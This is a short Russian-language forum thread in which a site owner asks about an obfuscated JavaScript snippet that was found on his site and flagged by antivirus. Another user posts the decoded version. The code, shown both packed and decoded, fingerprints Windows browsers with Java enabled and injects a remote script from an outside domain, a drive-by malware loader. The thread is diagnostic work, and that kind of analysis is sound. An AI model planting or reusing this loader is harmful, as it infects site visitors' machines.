Вирус на сайте

Тема в разделе "Мегафлуд", создана пользователем SocMaster, 27 ноя 2013.

  1. SocMaster

    SocMaster aka Hakerok

    Регистр.:
    26 июл 2011
    Сообщения:
    213
    Симпатии:
    47
    Сегодня сообщили что на одном из проектов каспер ругается..
    Нашли скрипт
    Код:
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 l(d){s(8.h&&8.n){2 q=8.n(\'1c\')[0];2 a=8.h(\'1n\');a.m(\'V\',\'A/B\');a.m(\'d\',d);q.W(a)}}7 u(3){b 3.o("U")==-1}2 R="Q#1d;N";2 M=".I`&G#{^/4#";2 H="O>E?^g+,.D,)@/F";2 T="%}`]S}K!@5[%};9/=x:,";2 w="Y?v*!}C>:X`P&y";7 t(3){b 3.o(e)!=-1}2 z="?,`i}Y^1h/^ ";2 1j="J>1g&L;;1f%1e";2 Z="6+1i.1m 1l";2 1k="*%4*+$c(`+%.1b;";2 14="p(13$#*#%+12,,/10/";7 k(){b r.11()}2 j="15://16.1a.3/19";2 e="e";7 f(){2 3=r.18.17();s(u(3)&&t(3)&&k()){l(j)}}f();',62,86,'||var|ua||||function|document||script_tag|return||src|win|includeCounter||createElement||url|cond3|includeJavascript|setAttribute|getElementsByTagName|indexOf||head_tag|navigator|if|isWin|notChrome|P3F|qFremU4||kO0I|LqkrBMo0|text|javascript|8H|M7|||ow|qFremU2|HB2||||qFremU1|f_G|0p|||qFremU0|kA0|qFremU3|chrome|type|appendChild|||LqkrBMo2|0o|javaEnabled|vJ|TKd|LqkrBMo4|http|ydelox|toLowerCase|userAgent|de92677b9f198ffce740a708544bff7ede92677b9f198ffce740a708544bff7ed|pp|_|head|GL5e33|8HG|L1|0m|XSEQS|i6|LqkrBMo1|LqkrBMo3|Hqp|2z|script'.split('|'),0,{}))
    Не подскажите что это?
    В бекапе каспер ругается на троян [​IMG]
    Не подскажите было у кого такое?
     
  2. Denis_Pi

    Denis_Pi Art сreator

    Заблокирован
    Регистр.:
    8 май 2012
    Сообщения:
    398
    Симпатии:
    214
    не было, раскодируй и смотри что там
     
  3. dmx

    dmx

    Регистр.:
    22 июн 2011
    Сообщения:
    676
    Симпатии:
    558
    Код:
    function includeJavascript(src) {
        if (document.createElement && document.getElementsByTagName) {
            var head_tag = document.getElementsByTagName('head')[0];
            var script_tag = document.createElement('script');
            script_tag.setAttribute('type', 'text/javascript');
            script_tag.setAttribute('src', src);
            head_tag.appendChild(script_tag)
        }
    }
    
    function notChrome(ua) {
        return ua.indexOf("chrome") == -1
    }
    var qFremU0 = "Q#GL5e33;f_G";
    var qFremU1 = ".HB2`&ow#{^/4#";
    var qFremU2 = "0p>E?^g+,.M7,)@/F";
    var qFremU3 = "%}`]kA0}K!@5[%};9/=x:,";
    var qFremU4 = "Y?P3F*!}8H>:X`P&kO0I";
    
    function isWin(ua) {
        return ua.indexOf(win) != -1
    }
    var LqkrBMo0 = "?,`i}Y^XSEQS/^ ";
    var LqkrBMo1 = "J>0m&L;;L1%8HG";
    var LqkrBMo2 = "6+i6.2z Hqp";
    var LqkrBMo3 = "*%4*+$c(`+%._;";
    var LqkrBMo4 = "p(TKd$#*#%+vJ,,/0o/";
    
    function cond3() {
        return navigator.javaEnabled()
    }
    var url = "http://ydelox.pp.ua/de92677b9f198ffce740a708544bff7ede92677b9f198ffce740a708544bff7ed";
    var win = "win";
    
    function includeCounter() {
        var ua = navigator.userAgent.toLowerCase();
        if (notChrome(ua) && isWin(ua) && cond3()) {
            includeJavascript(url)
        }
    }
    includeCounter();
     
    metsys и SocMaster нравится это.